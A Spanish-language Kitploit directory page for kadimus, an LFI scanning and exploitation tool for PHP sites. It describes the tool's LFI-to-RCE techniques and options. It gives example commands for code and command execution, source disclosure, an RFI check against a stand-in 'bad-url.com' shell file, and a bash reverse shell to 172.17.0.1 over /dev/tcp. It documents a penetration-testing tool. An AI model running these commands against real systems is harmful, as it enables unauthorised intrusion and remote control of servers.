Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
kadimus — kadimus es una herramienta para comprobar y explotar vulnerabilidades LFI. | Kitploit
Herramientas/GitHubGitHub/p0cl4bs/kadimus
Escáneres de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso RemotoArchived
GitHubp0cl4bs/kadimus

kadimus

kadimus es una herramienta para comprobar y explotar vulnerabilidades LFI.

Ver Repositorio
575127hace 6 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Rawsec's CyberSecurity Inventory GitHub stars GitHub license

kadimus

Herramienta de Escaneo y Explotación LFI

kadimus es una herramienta para verificar y explotar vulnerabilidades LFI, con un enfoque en sistemas PHP.

Características:

  • Verificar todos los parámetros de URL
  • /var/log/auth.log RCE
  • /proc/self/environ RCE
  • php://input RCE
  • data://text RCE
  • expect://cmd RCE
  • Divulgación de código fuente
  • Interfaz de shell de comandos a través de solicitud HTTP
  • Soporte de proxy (socks4://, socks4a://, socks5://, socks5h:// y http://)
  • Soporte de proxy socks5 para conexiones remotas

Compilar:

Primero, asegúrate de tener todas las dependencias instaladas en tu sistema: libcurl, libopenssl, libpcre y libssh.

Luego puedes clonar el repositorio para obtener el código fuente:

root@kitploit:~
$ git clone https://github.com/P0cL4bs/kadimus.git
$ cd kadimus

Y finalmente:

root@kitploit:~
$ make

Opciones:

root@kitploit:~
Options:
  -h, --help                    Display this help menu

  Request:
    -B, --cookie STRING         Set custom HTTP cookie header
    -A, --user-agent STRING     User-Agent to send to server
    --connect-timeout SECONDS   Maximum time allowed for connection
    --retry NUMBER              Number of times to retry if connection fails
    --proxy STRING              Proxy to connect (syntax: protocol://hostname:port)

  Scanner:
    -u, --url STRING            URL to scan/exploit
    -o, --output FILE           File to save output results

  Explotation:
    --parameter STRING          Parameter name to inject exploit
                                (only needed by RCE data and source disclosure)

  RCE:
    -T, --technique=TECH        LFI to RCE technique to use
    -C, --code STRING           Custom PHP code to execute, with php brackets
    -c, --cmd STRING            Execute system command on vulnerable target system
    -s, --shell                 Simple command shell interface through HTTP request

    --connect STRING            IP/hostname to connect to
    -p, --port NUMBER           Port number to connect to or listen on
    -l, --listen                Bind and listen for incoming connections

    --ssh-port NUMBER           Set the SSH port to try command injection (default: 22)
    --ssh-target STRING         Set the SSH host

    RCE Available techniques

      environ                   Try to run PHP code using /proc/self/environ
      input                     Try to run PHP code using php://input
      auth                      Try to run PHP code using /var/log/auth.log
      data                      Try to run PHP code using data://text
      expect                    Try to run a command using expect://cmd

    Source Disclosure:
      -S, --source              Try to get the source file using filter://
      -f, --filename STRING     Set filename to grab source [REQUIRED]
      -O FILE                   Set output file (default: stdout)

Ejemplos:

Escaneo:

root@kitploit:~
./kadimus -u localhost/?pg=contact -A my_user_agent

Obtener código fuente de archivo:

root@kitploit:~
./kadimus -u localhost/?pg=contact -S -f "index.php%00" -O local_output.php --parameter pg

Ejecutar código PHP:

root@kitploit:~
./kadimus -u localhost/?pg=php://input%00 -C '<?php echo "pwned"; ?>' -T input

Ejecutar comando:

root@kitploit:~
./kadimus -t localhost/?pg=/var/log/auth.log -T auth -c 'ls -lah' --ssh-target localhost

Verificación de RFI:

También puedes verificar errores RFI: solo coloca la URL remota en resource/common_files.txt y la expresión regular para identificarlos, ejemplo:

root@kitploit:~
/* http://bad-url.com/shell.txt */
<?php echo base64_decode("c2NvcnBpb24gc2F5IGdldCBvdmVyIGhlcmU="); ?>

en archivo:

root@kitploit:~
http://bad-url.com/shell.txt?:scorpion say get over here

Shell inversa:

root@kitploit:~
./kadimus -u localhost/?pg=contact.php -T data --parameter pg -lp 12345 -c '/bin/bash -c "bash -i >& /dev/tcp/172.17.0.1/1234 0>&1"' --retry-times 0

Contribuciones

Puedes ayudar con código, o donando. Si quieres ayudar con código, usa el estilo de código del kernel como referencia.

Paypal:

BTC: 1PpbrY6j1HNPF7fS2LhG9SF2wtyK98GSwq

Descargar herramienta